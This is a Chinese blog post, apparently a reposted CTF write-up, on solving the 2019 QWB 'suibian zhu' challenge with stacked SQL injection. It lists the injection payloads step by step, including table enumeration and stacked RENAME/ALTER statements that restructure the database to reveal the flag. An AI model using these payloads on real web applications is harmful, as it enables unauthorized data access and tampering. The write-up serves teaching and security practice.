堆叠注入-[强网杯 2019]随便注
2022/4/27 23:12:47
本文主要是介绍堆叠注入-[强网杯 2019]随便注,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
输入1进去,发现可以正常输出;
在身上1';发现不能进行正常回显。
试了一下 1' or 1=1 #发现有正常回显;
再进行查询表;
1';show tables;
发现有两个表,只有一个一个的试,没有十分明显的标志;
1';show columns from `1919810931114514`;#
第一次试 1919810931114514这个表就发现了flag;
但在查这个数字表名试一定要加反引号``,在这个地方卡了好久。。;
继续查找flag;发现我无法直接查出flag的值;
又去查了一下words的内容
没有找到有用信息;就搜了一下wp,发现还要改表名;只有去改表名;
1';rename table words to word1;rename table `1919810931114514` to words;
alter table words add id int unsigned not null auto_increment primary key;
alter table words change flag data varchar(100);#
将flag的列改为id,以便直接查询;
还是回到了原来的样子;
再用1' or 1=1;# 进行查询;得到flag。
总结:这个主要利用了sql的叠堆注入;过滤了太多的关键字,无法直接进行查询。
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。每一条语句的结束用;(分号)隔开;主要是要用到改表名;
这篇关于堆叠注入-[强网杯 2019]随便注的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?
- 2024-05-09这种运行结果里的10.100000001,怎么能最快改成10.1?
- 2024-05-09企业src漏洞挖掘-有意思的命令执行